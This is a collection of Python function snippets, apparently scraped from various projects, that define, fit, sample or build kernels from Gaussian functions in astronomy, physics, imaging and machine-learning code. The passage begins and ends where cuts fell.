indexblue=womget_element(nwave, waveint[0])\n indexred=womget_element(nwave,waveint[-1])\n if (mode == 'w'):\n done = False\n while (not done):\n print(' ')\n wavecenter=inputter('Enter approximate center of Gaussian : ','float',False)\n indexcenter=womget_element(waveint,wavecenter)\n if (indexcenter <= 0) or (wavecenter > waveint[-1]):\n print('Bad central wavelength, try again')\n else:\n done = True\n else:\n done=False\n while (not done):\n print('Mark the approximate center of the Gaussian')\n pickcent=plt.ginput(1,timeout=-1)\n indexcenter=womget_element(waveint,pickcent[0][0])\n print('\\nApproximate center at {}'.format(waveint[indexcenter]))\n print('\\nIs this OK?')\n answer=yesno('y')\n if (answer == 'y'):\n done=True\n weights=np.sqrt(hop[0].var[indexblue:indexred+1])\n print(' ')\n continuum=inputter_single('Do you want to fit gaussian with (c)ontinuum, or (n)o continuum? ','cn')\n if (continuum == 'c'):\n p=[fluxint[indexcenter], waveint[indexcenter],3.0,1.0,waveint[0]]\n result=curve_fit(gauss_cont,waveint,fluxint,sigma=weights,p0=p,absolute_sigma=True,full_output=True)\n else:\n p=[fluxint[indexcenter], waveint[indexcenter],3.0]\n result=curve_fit(gauss,waveint,fluxint,sigma=weights,p0=p,absolute_sigma=True,full_output=True)\n coefferr=np.sqrt(np.diag(result[1]))\n coeff=result[0]\n # make 'finer-grained' version of fit, 0.2A/pix for calculations\n wavecalc=np.arange(2*5*50*abs(coeff[2]))*0.2+coeff[1]-0.2*5*50*abs(coeff[2])\n calccenter=womget_element(wavecalc,coeff[1])\n if (continuum == 'c'):\n fluxcalc=gauss_cont(wavecalc,*coeff)\n fluxcont=wavecalc*coeff[3]+coeff[4]\n fluxgaussian=fluxcalc-fluxcont\n linecont=fluxcont[calccenter]\n else:\n fluxcalc=gauss(wavecalc,*coeff)\n \n \n deltafit=wavecalc[1]-wavecalc[0]\n calcindexblue=womget_element(wavecalc,waveint[0])\n calcindexred=womget_element(wavecalc,waveint[-1])\n sumfluxcalc=np.sum(fluxcalc[calcindexblue:calcindexred+1]*deltafit)\n sumallfluxcalc=np.sum(fluxcalc*deltafit)\n chi=(result[2]['fvec']**2).sum()\n redchi=chi/(len(waveint)-len(coeff))\n if (continuum == 'c'):\n sumfluxgaussian=np.sum(fluxgaussian[calcindexblue:calcindexred+1]*deltafit)\n sumallfluxgaussian=np.sum(fluxgaussian*deltafit)\n sumfluxcont=np.sum(fluxcont[calcindexblue:calcindexred+1]*deltafit)\n sumallfluxcont=np.sum(fluxcont*deltafit)\n sumallfluxcont_test=np.sum(fluxcont)\n # propagate uncertainty (from old version) not sure this is correct\n height_pct=coefferr[0]/coeff[0]\n sigma_pct=coefferr[2]/coeff[2]\n flux_pct=np.sqrt(height_pct**2+sigma_pct**2)\n sumfluxgaussiansig=sumfluxgaussian*flux_pct\n sumallfluxgaussiansig=sumallfluxgaussian*flux_pct\n plt.cla()\n plt.plot(nwave,nflux,drawstyle='steps-mid',color='k')\n plt.ylabel('Flux')\n plt.xlabel('Wavelength')\n xmin,xmax=plt.xlim()\n ymin,ymax=plt.ylim()\n plt.plot(wavecalc,fluxcalc,drawstyle='steps-mid',color='b')\n if (continuum == 'c'):\n plt.plot(wavecalc,fluxgaussian,drawstyle='steps-mid',color='r')\n plt.plot(wavecalc,fluxcont,drawstyle='steps-mid',color='g')\n plt.plot([waveint[0],waveint[0]],[ymin,ymax],color='k',linestyle='--')\n plt.plot([waveint[-1],waveint[-1]],[ymin,ymax],color='k',linestyle='--')\n plt.xlim([xmin,xmax])\n plt.ylim([ymin,ymax])\n logging.info('For object {} Gaussian fit'.format(hop[0].obname))\n if (continuum == 'c'):\n print('\\nData = Black, Fit = Blue, Continuum = Green, Fit-Continuum = Red\\n')\n else:\n print('\\nData = Black, Fit = Blue\\n')\n logging.info('Height {:16.8f}+/-{:16.8f}'.format(coeff[0],coefferr[0]))\n logging.info('Center {:16.8f}+/-{:16.8f}'.format(coeff[1],coefferr[1]))\n logging.info('Sigma {:16.8f}+/-{:16.8f}'.format(coeff[2],coefferr[2]))\n if (continuum == 'c'):\n FWHM = 2.35482*np.abs(coeff[2])\n rest_wave = input('Rest wavelength [N/A]: ') or None\n redshift = input('Redshift [N/A]: ') or None\n if rest_wave:\n rest_wave = float(rest_wave)\n w1 = (rest_wave - FWHM/2.)/(1.+float(redshift)) \n w2 = (rest_wave + FWHM/2.)/(1.+float(redshift)) \n c = 299792.458\n v1 = -1.*c*((rest_wave/w1)**2. - 1)/(1+((rest_wave/w1)**2.))\n v2 = -1.*c*((rest_wave/w2)**2. - 1)/(1+((rest_wave/w2)**2.))\n logging.info('Slope {:16.8f}+/-{:16.8f}'.format(coeff[3],coefferr[3]))\n logging.info('Y-intercept {:16.8f}+/-{:16.8f}'.format(coeff[4],coefferr[4]))\n logging.info('FWHM {:16.8f}+/-{:16.8f}'.format(2.35482*np.abs(coeff[2]),2.35482*coefferr[2]))\n logging.info('FWHM (velocity) {:16.8f} km/s'.format(v2-v1))\n logging.info('Flux between dotted lines (Gaussian): {:16.8f}+/-{:16.8f}'.format(sumfluxgaussian, sumfluxgaussiansig))\n logging.info('EW between dotted lines (Gaussian): {:16.8f}'.format(sumfluxgaussian/linecont))\n logging.info('Flux for full (Gaussian): {:16.8f}+/-{:16.8f}'.format(sumallfluxgaussian, sumallfluxgaussiansig))\n logging.info('EW for full (Gaussian): {:16.8f}'.format(sumallfluxgaussian/linecont))\n logging.info('Continuum flux at line center: {:16.8f}'.format(linecont))\n\n \n logging.info('Chi^2: {}'.format(chi))\n logging.info('Reduced chi^2: {}'.format(redchi))\n logging.info('All fluxes might need to be scaled by 1e-15')\n print(' ')\n return hop", "def gaussian_likelihood(input_, mu_, log_std):\n pre_sum = -0.5 * (((input_ - mu_) / (\n tf.exp(log_std) + EPS)) ** 2 + 2 * log_std + np.log(\n 2 * np.pi))\n return tf.reduce_sum(pre_sum, axis=1)", "def gaussian(x, x0=0.0, fwhm=1.0, ampl=1.0):\n return ampl * np.exp(-4 * np.log(2) * ((x - x0) / fwhm) ** 2)", "def bigaussian(mu, wid, x, m = 0.5):\n lx = x.shape[0]\n ix = np.where(x == mu)[0][0]\n \n y = np.ones(lx)\n y[0:ix] = gaussian(mu, wid * m, x[0:ix])\n y[ix+1:lx] = gaussian(mu, wid * (1 - m), x[ix+1:lx]) \n \n return y", "def GaussianFit(data, title=\"\"):\n y, binEdges = np.histogram(data, 50)\n x = (binEdges[:-1] + binEdges[1:]) / 2\n x_width = (x[-1] - x[0]) / len(x)\n y_err = np.sqrt(y) # items in a bin should follow the Poisson distribution\n\n # calculate optimal fit parameters and covariance matrix using least squares method\n popt, cov = curve_fit(Gaussian, x, y, [np.mean(data), np.std(data), 10])\n\n # plot data\n plt.bar(x, y, x_width, yerr=y_err, color=\"blue\", edgecolor=\"black\", capsize=3, ecolor=\"black\")\n \n text1 = \"Mean (GeV): \" + str( round_to(popt[0], cov[0, 0]) ) + \" $\\pm$ \" + str( round_to(cov[0, 0], cov[0, 0]) )\n\n text2 = \"Standard deviation (GeV): \" + str( round_to(popt[1], cov[1, 1]) ) + \" $\\pm$ \" + str( round_to(cov[1, 1], cov[1, 1]) )\n\n text = '\\n'.join((text1, text2))\n\n # plot gaussian fit\n x_int = np.linspace(x[0], x[-1], 10*len(x)) # interpolate data\n y_int = Gaussian(x_int, *popt)\n plt.plot(x_int, y_int, label=\"Gaussian fit\", color=\"red\")\n\n\n plt.annotate(text, xy=(0.025, 0.8), xycoords='axes fraction')\n\n # plot options\n plt.legend()\n plt.xlabel(\"Energy (GeV)\")\n plt.ylabel(\"Number of events (bin width=\" + str(round(x_width, 2)) + \" GeV)\")\n plt.title(title)\n #plt.title(\"Beam momentum 100GeV, magnetic field \" + str(geometry.B) + \"T.\")\n \n # return some results, mean, standard deviation, amplitude\n return [popt[0], cov[0, 0]], [popt[1], cov[1, 1]], [popt[2], cov[2, 2]]", "def gaussian(self, amp_step, sigma_step):\n l = len(self.overlaid_x_axis)\n x = np.linspace(0, l, l) - l/2 # centre of data\n\n # This is new code to 'guess' the size of the Gaussian from the\n # existing data rather than from hard-coded numbers.\n # TODO: test this! Possibly link up to the get_windowed_data function\n # as it uses a lot of the same functionality\n trigger = self.pv_monitor.arrays[self.controls.Arrays.WAVEFORMS][0]\n trace = self.pv_monitor.arrays[self.controls.Arrays.WAVEFORMS][1]\n amplitude = max(trace) + amp_step\n diff = np.diff(trigger)\n stepvalue = 0.5\n if min(diff) > -1 * stepvalue or max(diff) < stepvalue:\n raise RangeError\n else:\n maxtrig = next(x for x in diff if x > stepvalue)\n mintrig = next(x for x in diff if x < -1 * stepvalue)\n edges = [np.where(diff == maxtrig)[0][0],\n np.where(diff == mintrig)[0][0]]\n half_trigger_length = (edges[1]-edges[0])\n sigma = half_trigger_length/4 + sigma_step\n\n gauss = self.ax2.plot(amplitude * np.exp(-x**2 / (2 * sigma**2)), 'r')\n self.overlaid_lines.append(gauss)\n self.draw()", "def makeGaussian(size, fwhm, sigma, center=None):\n\n x = np.arange(0, size, 1, float)\n y = x[:,np.newaxis]\n\n if center is None:\n x0 = y0 = size // 2\n else:\n x0 = center[0]\n y0 = center[1]\n \n #return (np.exp(-4*np.log(2) * ((x-x0)**2 + (y-y0)**2) / fwhm**2)) #approximation using exponenial functions\n return ((1/(2*np.pi*sigma**2))*np.exp(-((xx)**2 + (yy)**2)/(2*sigma**2))) # symmetric 2D Gaussian distribution", "def Gaussian(x, t, sigma):\n return np.exp(-(x - t)**2 / (2 * sigma**2))", "def fitbivarGaussian(data):\n params = bivarParams(data)\n errorfunction = lambda p: ravel(bivarGaussian(*p)(*indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*np.exp(\n -(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*np.exp(\n -(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*np.exp(\n -(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def _f_special_gauss(size, sigma):\n radius = size // 2\n offset = 0.0\n start, stop = -radius, radius + 1\n if size % 2 == 0:\n offset = 0.5\n stop -= 1\n x, y = np.mgrid[offset + start:stop, offset + start:stop]\n assert len(x) == size\n g = np.exp(-((x ** 2 + y ** 2) / (2.0 * sigma ** 2)))\n g /= g.sum()\n return tf.constant(g, dtype=tf.float32)", "def gaussian(window_size, sigma):\n gauss = torch.Tensor([math.exp(-(x - window_size//2)**2/float(2*sigma**2)) for x in range(window_size)])\n return gauss/gauss.sum()", "def gaussianPSF(shape, sigma):\n psf = dg.drawGaussiansXY(shape,\n numpy.array([0.5*shape[0]]),\n numpy.array([0.5*shape[1]]),\n sigma = sigma)\n return psf/numpy.sum(psf)", "def fit_ndgaussian(xdata, fdata):\n m, n = xdata.shape\n n2 = 2 * n\n fsuminv = 1 / numpy.sum(fdata)\n\n # Estimate initial parameters\n mean = fsuminv * numpy.sum(fdata * xdata.transpose(), axis=1)\n dx = (xdata - mean).transpose()\n cov = fsuminv * (fdata * dx).dot(dx.transpose())\n\n evals, evecs = linalg.eigh(cov)\n covdet = numpy.prod(evals)\n\n scale = fdata.max() * numpy.sqrt(covdet * (2 * numpy.pi) ** n)\n\n # Make sure the matrix of eigenvectors is orthogonal and proper (det +1)\n if linalg.det(evecs) < 0:\n evecs[:, 0] = -evecs[:, 0]\n\n ## Use the Cayley transform to extract n(n - 1) / 2 independent parameters\n ## from the orthogonal eigenvector matrix\n #eye = numpy.eye(n)\n #evecs_c = (eye - evecs).dot(linalg.inv(eye + evecs))\n #upper = numpy.triu_indices(n, k=1)\n\n # Use the parametrization in orthogonal_matrix()\n angles = angles_from_orthogonal_matrix(evecs)\n\n # Make a list with the minimal number of parameters to specify a Gaussian\n #params = numpy.hstack((scale, mean, numpy.sqrt(evals), evecs_c[upper]))\n params = numpy.hstack((scale, mean, numpy.sqrt(evals), angles))\n #params = numpy.hstack((numpy.sqrt(scale), mean, numpy.sqrt(evals),\n # angles))\n #params = numpy.hstack((scale, mean, evals, angles))\n\n def params_to_scale_mean_cov(params_):\n \"\"\"\n Extract the scale, mean and covariance matrix from the minimal\n parameter array\n\n \"\"\"\n # Extract scale and mean\n #scale_sqrt_ = params_[0]\n #scale_ = scale_sqrt_ * scale_sqrt_\n scale_ = params_[0]\n\n mean_ = params_[1:n + 1]\n\n # Get eigenvalues\n evals_sqrt_ = numpy.array(params_[n + 1:n2 + 1])\n evals_ = evals_sqrt_ * evals_sqrt_\n #evals_ = numpy.array(params_[n + 1:n2 + 1])\n\n ## Reconstruct the transformed eigenvector matrix\n #cov_c_ = numpy.zeros((n, n))\n #cov_c_[upper] = params_[n2 + 1:]\n #cov_c_.transpose()[upper] = -cov_c_[upper]\n #\n ## Use an inverse Cayley transform to get the true eigenvector matrix\n #evecs_ = (eye - cov_c_).dot(linalg.inv(eye + cov_c_))\n\n # Get eigenvector matrix from orthogonal_matrix()\n evecs_ = orthogonal_matrix_from_angles(n, params_[n2 + 1:])\n\n # Get the covariance matrix from the eigenvectors and eigenvalues\n cov_ = evecs_.dot(numpy.diag(evals_).dot(evecs_.transpose()))\n\n return scale_, mean_, cov_\n\n def param_gauss(xdata_, *params_):\n \"\"\"\n Define a Gaussian function specified by a minimal number of parameters\n\n \"\"\"\n scale_, mean_, cov_ = params_to_scale_mean_cov(params_)\n return scale_ * gaussian(xdata_, mean=mean_, cov=cov_)\n\n def error(params_):\n eps = fdata - param_gauss(xdata, *params_)\n return numpy.sum(eps * eps)\n\n # Find the parameter array that solves the least-squares fitting problem\n #params, __ = optimize.curve_fit(param_gauss, xdata, fdata, p0=params)\n l = n * (n - 1) // 2\n bounds = ([(0.0, None)] + # Scale must be positive\n [(None, None)] * n + # Means for each axis -- any value\n [(None, None)] * n + # Square roots of evals -- any value\n [(0.0, 2 * numpy.pi)] * l) # Angles constrained to one cycle\n params = optimize.minimize(error, params, bounds=bounds).x\n\n scale, mean, cov = params_to_scale_mean_cov(params)\n\n return scale, mean, cov", "def generate_gaussian():\n amp = 10 * numpy.random.chisquare(3)\n width = numpy.random.chisquare(3)\n mean = numpy.random.uniform(-10 + width, 10 - width)\n x = numpy.linspace(-10, 10, 500)\n y = amp * numpy.exp(- (x - mean) ** 2 / width ** 2)\n add_noise(y, 0.1)\n return x, y", "def gaussian_likelihood(x, mu, log_std):\n prob = -0.5 * (((x - mu) / (tf.exp(log_std) + EPS)) ** 2 + 2 * log_std + np.log(2 * np.pi))\n return tf.reduce_sum(prob, axis=1)", "def gaussian_kernel(windowX, windowY, sigma):\n X,Y = createKernalWindowRanges(windowX, windowY, increment)\n \n gKernel = gaussianNormalised(X, 0, sigma) * gaussianNormalised(Y, 0, sigma)\n gSum = np.sum(np.abs(gKernel))\n \n if gSum == 0:\n print \"Warning gaussian_kernel:: Not normalising by sum of values, as sum = \" + str(gSum)\n return (gKernel)\n else:\n return (gKernel / gSum)", "def add_gaussian(self, A=1000, sigma=(200, 200), x0=None):\n if x0 is None:\n x0 = self._beam_position\n \n self.map += np.asarray(np.round(\n gaussian2d(self._X, self._Y, A, sigma, x0)), dtype=np.int32)", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*exp(\n -(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def gaussian_decay(A, sigma, x, y):\n return A * math.exp(-((pow(x-16.,2.)/(2*pow(sigma,2)) + \\\n (pow(y-16.,2.)/(2*pow(sigma,2))))))", "def wrapper_fit_func(x, ntraps, *args):\n a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])\n offset = args[0][-1]\n return gaussianarray1d(x, a, b, c, offset, ntraps)", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*np.exp(-(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def fit_gauss(x, y):\n nx = numpy.array(x)\n ny = numpy.array(y)\n ne = numpy.ones(len(ny))\n#\n#--- we need to give an initial guess\n#\n ymax = numpy.max(ny)\n med = find_med(y)\n p0 = [ymax, med, 10, 0]\n\n fitobj = kmpfit.Fitter(residuals=residualsG, data=(nx,ny,ne))\n fitobj.fit(params0=p0)\n [amp, cent, width, floor] = fitobj.params\n\n return [amp, cent, width]", "def fit_gaussian(x, y, z):\n\n def sym_gaussian(p):\n \"\"\"\n Returns a Gaussian function:\n a**2 * exp(-((x - x_0)**2 + (y - y_0)**2) / (2 * sigma**2))\n p = [a, x_0, y_0, sigma]\n \"\"\"\n a, x_0, y_0, sigma = p\n return a**2 \\\n * np.exp(-((x - x_0)**2 + (y - y_0)**2) / (2.0 * sigma**2))\n\n def sym_gaussian_resids(p):\n \"\"\"Residuals to be sent into leastsq\"\"\"\n return z - sym_gaussian(p)\n\n def guess_fit_gaussian():\n \"\"\"\n return a, x_0, y_0, and sigma based on computing moments of data\n \"\"\"\n a = z.max()\n\n # Compute moments\n total = z.sum()\n x_0 = np.dot(x, z) / total\n y_0 = np.dot(y, z) / total\n\n # Approximate sigmas\n sigma_x = np.dot(x**2, z) / total\n sigma_y = np.dot(y**2, z) / total\n sigma = np.sqrt(sigma_x * sigma_y)\n\n # Return guess\n return (a, x_0, y_0, sigma)\n\n # Get guess\n p0 = guess_fit_gaussian()\n\n # Perform optimization using nonlinear least squares\n popt, junk_output, info_dict, mesg, ier = \\\n scipy.optimize.leastsq(sym_gaussian_resids, p0, full_output=True)\n\n # Check to make sure leastsq was successful. If not, return centroid\n # estimate.\n if ier in (1, 2, 3, 4):\n return (popt[0]**2, popt[1], popt[2], popt[3])\n else:\n return p0", "def GaussianKernel(sigma: float = 1., width: int = 0):\n assert not ((width is None or width == 0) and\n (sigma is None or sigma == 0)), \\\n \"GaussianKernel :: both sigma ({}) & width ({}) are not valid\".format(\n sigma, width)\n\n if width is None or width == 0:\n width = int(2.0 * 3.0 * sigma + 1.0)\n if width % 2 == 0:\n width += 1\n\n if sigma is None or sigma == 0:\n sigma = (width - 1)/6.\n half = width//2\n x, y = np.meshgrid(np.linspace(-half, half, width),\n np.linspace(-half, half, width), indexing='xy')\n w = np.exp(- (x**2 + y**2) / (2.*(sigma**2)))\n w /= np.sum(w)\n return torch.from_numpy(w.astype(np.float32)).view(1, 1, width, width)", "def sampleGaussian(self, mu, log_sigma):\n # reparameterization trick\n epsilon = tf.random_normal(tf.shape(log_sigma), name=\"epsilon\")\n return mu + epsilon * tf.exp(log_sigma) # N(mu, I * sigma**2)", "def gauss_smooth(data, sigma):\n\t\t\t# make the kernel 5 sigmas wide in each direction\n\t\t\tkernel = stats.norm.pdf(np.arange(-5*sigma, (5*sigma)+1), scale=sigma)\n\t\t\t\n\t\t\treturn sp.ndimage.convolve1d(data, kernel, axis=2)", "def _FSpecialGauss(size, sigma):\n radius = size // 2\n offset = 0.0\n start, stop = -radius, radius + 1\n if size % 2 == 0:\n offset = 0.5\n stop -= 1\n x, y = np.mgrid[offset + start:stop, offset + start:stop]\n assert len(x) == size\n g = np.exp(-((x**2 + y**2)/(2.0 * sigma**2)))\n return g / g.sum()", "def flat_top_gaussian(a1_val, a2_val, sigma1, sigma2, w1_val, w2_val, w_val):\n gauss1 = a1_val * np.exp(-(w_val - w1_val)**4/(2 * sigma1**2))\n gauss2 = a2_val * np.exp(-(w_val - w2_val)**4/(2 * sigma2**4))\n sum_gauss = gauss1 + gauss2\n return sum_gauss", "def gaussian2d(x, y, A, sigma, x0):\n Z = A * np.exp(-( (x-x0[0])**2/(2*sigma[0]**2) + (y-x0[1])**2/(2*sigma[1]**2)))\n return Z", "def fit_psf_to_gaussian(self, xx, yy, psf_data, x0, y0, sigmax0, sigmay0):\n peak0, offset0 = 1.0, 0.0 # Guesses\n # # We guess that the FWHM will be around 2 detector pixels [30 microns]\n # # Using the formula for a Gaussian FWHM = 2 sqrt(2 ln(2)) Sigma\n # sigma_fwhm = 100e-3 / 2 * np.sqrt(2 * np.log(2))\n # sigmax0, sigmay0 = sigma_fwhm, sigma_fwhm\n\n guess_param = [x0, y0, sigmax0, sigmay0, peak0, offset0]\n bounds = ([-np.inf, -np.inf, 0.0, 0.0, 0, -np.inf],\n [np.inf, np.inf, np.inf, np.inf, np.inf, np.inf])\n\n while True:\n # The Gaussian fit can sometimes fail if our guess for the size of the PSF is very wrong\n try:\n pars, cov = curve_fit(self.gaussian2d, (xx.ravel(), yy.ravel()), psf_data.ravel(),\n p0=guess_param, bounds=bounds)\n # Results of the fit for the sigmaX, sigmaY\n sigmaX, sigmaY = pars[2], pars[3]\n # print(\"Successful Guassian Fit\")\n break\n\n except RuntimeError: # If it fails to converge, repeat with a randomly perturbed guess\n # sigmaX, sigmaY = np.nan, np.nan\n print(\"\\n[WARNING] Gaussian Fit of the PSF failed!\")\n\n # try with other guesses\n deltax = np.random.uniform(low=-1.0, high=1.0)\n deltay = np.random.uniform(low=-1.0, high=1.0)\n new_sigmax0 = (1 + deltax) * sigmax0\n new_sigmay0 = (1 + deltay) * sigmay0\n print(\"Trying with new Sigmas: X %.3f & Y %.3f microns\" % (1e3 * new_sigmax0, 1e3 * new_sigmay0))\n guess_param = [x0, y0, new_sigmax0, new_sigmay0, peak0, offset0]\n\n # Use the formula for the Gaussian FWHM to transform the sigmas into FWHM values\n fwhm_x = 2 * np.sqrt(2 * np.log(2)) * sigmaX * 1000\n fwhm_y = 2 * np.sqrt(2 * np.log(2)) * sigmaY * 1000\n\n return fwhm_x, fwhm_y", "def gaussian_sigma(t, params):\n t_final = tf.cast(params['t_final'].get_value(), dtype=tf.float64)\n sigma = tf.cast(params['sigma'].get_value(), dtype=tf.float64)\n gauss = tf.exp(-(t - t_final / 2) ** 2 / (2 * sigma ** 2))\n norm = (tf.sqrt(2 * np.pi * sigma ** 2)\n * tf.math.erf(t_final / (np.sqrt(8) * sigma))\n - t_final * tf.exp(-t_final ** 2 / (8 * sigma ** 2)))\n offset = tf.exp(-t_final ** 2 / (8 * sigma ** 2))\n return (gauss - offset) / norm", "def gaus(x, A, mu, sigma):\n return A * np.exp(-(x - mu) ** 2 / (2. * sigma ** 2))", "def expgaussian(mu, wid, timeconstant, x): \n # Gaussian signal broadened by an exponetial signal\n g = gaussian(mu, wid, x)\n \n hly = np.round( len(g) / 2.0 )\n ey = np.r_[np.zeros(hly),g,np.zeros(hly)]\n fy = np.fft.fft(ey)\n a = np.exp(-(np.arange(len(fy))) / timeconstant )\n fa = np.fft.fft(a)\n fy1 = fy * fa\n ybz = np.real(np.fft.ifft(fy1)) / np.sum(a)\n yb = ybz[hly:len(ybz)-hly]\n \n return yb", "def gauss_fit(seld, data=''):\n mean, std = norm.fit(data)\n return mean, std", "def make_gaussian(size, sigma=10, center=None):\n\n x = np.arange(0, size[1], 1, float)\n y = np.arange(0, size[0], 1, float)\n y = y[:, np.newaxis]\n\n if center is None:\n x0 = y0 = size[0] // 2\n else:\n x0 = center[0]\n y0 = center[1]\n\n return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / sigma ** 2)", "def gaussian(t, params):\n DeprecationWarning(\"Using standard width. Better use gaussian_sigma.\")\n params['sigma'] = Qty(\n value=params['t_final'].get_value()/6,\n min_val=params['t_final'].get_value()/8,\n max_val=params['t_final'].get_value()/4,\n unit=params['t_final'].unit\n )\n return gaussian_sigma(t, params)", "def add_gaussian_noise(X, mu=0, sigma=0.1):\n noise = np.random.normal(0.0, sigma, size=X.size)\n return X + noise.reshape(X.shape)", "def gaussian2d(x, amplitude=1.0, center_x=0.0, sigma_x=1.0, center_y=0.0, sigma_y=1.0, rota=0.0):\n \n if len(x) == 1:\n y = x\n else:\n (x, y) = x\n \n if not sigma_y:\n sigma_y = sigma_x\n \n if not center_y:\n center_y = center_x\n \n if rota:\n center_x = center_x*np.cos(np.deg2rad(rota)) - center_y*np.sin(np.deg2rad(rota))\n center_y = center_x*np.sin(np.deg2rad(rota)) + center_y*np.cos(np.deg2rad(rota)) \n \n x = x*np.cos(np.deg2rad(rota)) - y*np.sin(np.deg2rad(rota))\n y = x*np.sin(np.deg2rad(rota)) + y*np.cos(np.deg2rad(rota))\n \n norm = 2.*np.pi*sigma_x*sigma_y\n #exp_x = np.power((x - center_x)/(sigma_x), 2.)\n #exp_y = np.power((y - center_y)/(sigma_y), 2.)\n g = amplitude*np.exp(-(((center_x - x)/sigma_x)**2 + \\\n ((center_y - y)/sigma_y)**2)/2.)\n \n return g #(amplitude/norm)*np.exp(-(exp_x + exp_y)/2.)", "def _beam_fit_fn_(z, d0, z0, Theta):\n return d0**2 + (Theta*(z-z0))**2", "def gaussian(T, Y, X, t, y, x, sigma, sigma_t=1):\n const_value = np.sqrt(2 * np.pi * sigma) ** 3\n norm = np.exp(\n -(\n ((X - x) ** 2) / (2 * sigma ** 2)\n + ((Y - y) ** 2) / (2 * sigma ** 2)\n + ((T - t) ** 2) / (2 * sigma_t ** 2)\n )\n )\n return norm / const_value", "def fitgaussian3d(data):\n \n params = moments3d(data)\n # Error function is simple difference between gaussian function and data.\n errorfunction = lambda p: np.ravel(gaussian3d(*p)(*np.indices(data.shape)) -\n data)\n opt = optimize.least_squares(errorfunction, params, bounds=([0,0,0,-np.inf, -np.inf,-np.inf,-np.inf],[data.shape[0]-1,data.shape[1]-1,data.shape[2]-1,np.inf,np.inf,np.inf,np.inf]))\n # Make all widths positive (negative values are equally valid but less useful downstream).\n for i in range(4,7):\n opt.x[i] = abs(opt.x[i])\n return opt", "def gauss(self, X, xm, amp, w):\n return amp * np.exp(-((X - xm) / w) ** 2)", "def makeGaussian(size, fwhm, center=None):\n\n x = sp.arange(0, size, 1, float)\n y = x[:,sp.newaxis]\n\n if center is None:\n x0 = y0 = size // 2\n else:\n x0 = center[0]\n y0 = center[1]\n\n return sp.exp(-4*sp.log(2) * ((x-x0)**2 + (y-y0)**2) / fwhm**2)", "def gaussianDist(self, x, mu, var):\n val = 1/(math.sqrt(2 * math.pi * var)) * math.exp(-1 * (x - mu)**2 / (2*var))\n return val", "def Gaussiankernel(size, sigma=1): \n size = int(size) // 2\n # create x grid and y grid\n x, y = np.mgrid[-size:size+1, -size:size+1] \n # gaussian distribution formula\n normal = 1 / np.sqrt(2.0 * np.pi * sigma**2)\n g = np.exp(-((x**2 + y**2) / (2.0*sigma**2))) * normal\n \n return g/g.sum()", "def makeGaussianKernel(sigma: float) -> np.ndarray:\n\n # Your code here.\n kernel_size = 8*sigma+1\n kernel = np.zeros([kernel_size,kernel_size], dtype=float)\n center = kernel_size//2\n \n \n s = 2*(sigma**2)\n sum_val = 0\n for i in range(0,kernel_size):\n for j in range(0,kernel_size):\n x = i-center\n y = j-center\n kernel[i,j] = np.exp(-(x**2+y**2) / s)\n sum_val += kernel[i,j]\n #/(np.pi * s)\n sum_val = 1/sum_val\n print(\"here is the kernel\", kernel*sum_val)\n return kernel*sum_val", "def Gaussian_sampling(mu=1,beta=1,size=None,rng=np.random.RandomState(100)):\n \n if (not np.isscalar(mu)):\n size=mu.shape\n if np.isscalar(beta):\n beta=np.repeat(beta,size[0])\n beta.shape=(beta.size,1)\n X=np.copy(mu)\n #for i in range(size[0]):\n # for j in range(size[1]):\n # X[i,j]=rng.normal(mu[i,j],1/math.sqrt(beta[i,0]),size=1)\n X=rng.normal(loc=0,scale=1,size=size)\n X=X/np.sqrt(beta) + mu\n if (np.isscalar(mu) and size is None):\n size=1\n X=rng.normal(mu,1/math.sqrt(beta),size=size)\n #tol=100\n #X[abs(X)>tol]=tol\n return X", "def gauss_kernels(size, sigma=1.0):\n if size < 3:\n size = 3\n\n m = size / 2\n x, y = np.mgrid[-m:m + 1, -m:m + 1]\n kernel = np.exp(-(x * x + y * y) / (2 * sigma * sigma))\n kernel_sum = kernel.sum()\n\n if not sum == 0:\n kernel = kernel / kernel_sum\n\n return kernel", "def gaussianNormalised(data, mu, sigma):\n data = data - mu\n g = exp ( - data**2 / (2*sigma**2) )\n gSum = np.sum(g)\n \n if gSum == 0:\n print \"Warning gaussianNormalised:: Not normalising by sum of values, as sum = \" + str(gSum)\n return (g)\n else:\n return (g / gSum)", "def fit_power_law_MMEN(a_array, sigma_array, a0=1., p0=1., p1=-1.5):\n assert len(a_array) == len(sigma_array) >= 2\n mmen_fit = curve_fit(f_linear, np.log10(a_array/a0), np.log10(sigma_array), [p0, p1])[0]\n sigma0, beta = 10.**(mmen_fit[0]), mmen_fit[1]\n return sigma0, beta", "def gauss_kern(sigma, size):\r\n size = int(np.floor(size/2))\r\n sizey = size\r\n x, y = scipy.mgrid[-size:size+1, -sizey:sizey+1]\r\n g = scipy.exp(-(x**2+y**2) / (2*(sigma)**2))\r\n return np.ravel(g / g.max())", "def normal_pmf(x: np.array, mean: float, sigma: float) -> np.array:\n x = np.exp(-1 / 2 * ((x - mean) / sigma) ** 2)\n x /= np.sqrt(2 * np.pi * sigma ** 2)\n x /= x.sum()\n return x", "def fitgaussian(data):\n params = moments(data)\n errorfunction = lambda p: np.ravel(gaussian_norot(*p)(*np.indices(data.shape)) -\n data)\n #scipy rihjt\n # Levenberg-Marquadt algorithm -> leastsq\n #bnds = None\n height, x, y, width_x, width_y, he1, x1,y1, wi1, wi2 = params\n #p, success = optimize.leastsq(errorfunction, params)\n bnds = (0,30)\n p = optimize.least_squares(errorfunction, params, bounds = bnds).x\n \n #least square 